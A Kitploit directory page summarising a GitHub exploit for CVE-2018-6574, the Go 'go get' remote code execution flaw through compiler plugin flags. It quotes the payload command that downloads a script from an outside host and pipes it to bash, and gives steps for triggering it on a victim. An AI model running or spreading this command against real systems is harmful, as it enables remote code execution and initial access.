Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-6574 | Kitploit
Tools/GitHubGitHub/frozenkp/cve-2018-6574
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubfrozenkp/cve-2018-6574

CVE-2018-6574

View Repository
214 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2018-6574

Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow go get remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin= and -plugin= arguments were not blocked. (from mitre)

RCE command

The command was compiled into the dynamic library calc_darwin.so. And the current command is curl newton.cycarrier:8002 | /bin/bash. It was used as an intitial access of a program. You have to host a file server on port 8002 and bind the host to your IP.

How to trigger?

At first, you have to install the required version of golang on the victim. Then, host this repo on a accessable git server. Finally, use go get command to gather this repo, and the command will be executed automatically.

Take my repo as example. You have to use the following command:

root@kitploit:~
go get github.com/frozenkp/CVE-2018-6574

Warning

This repo is only for evaluation purpose.

Download Tool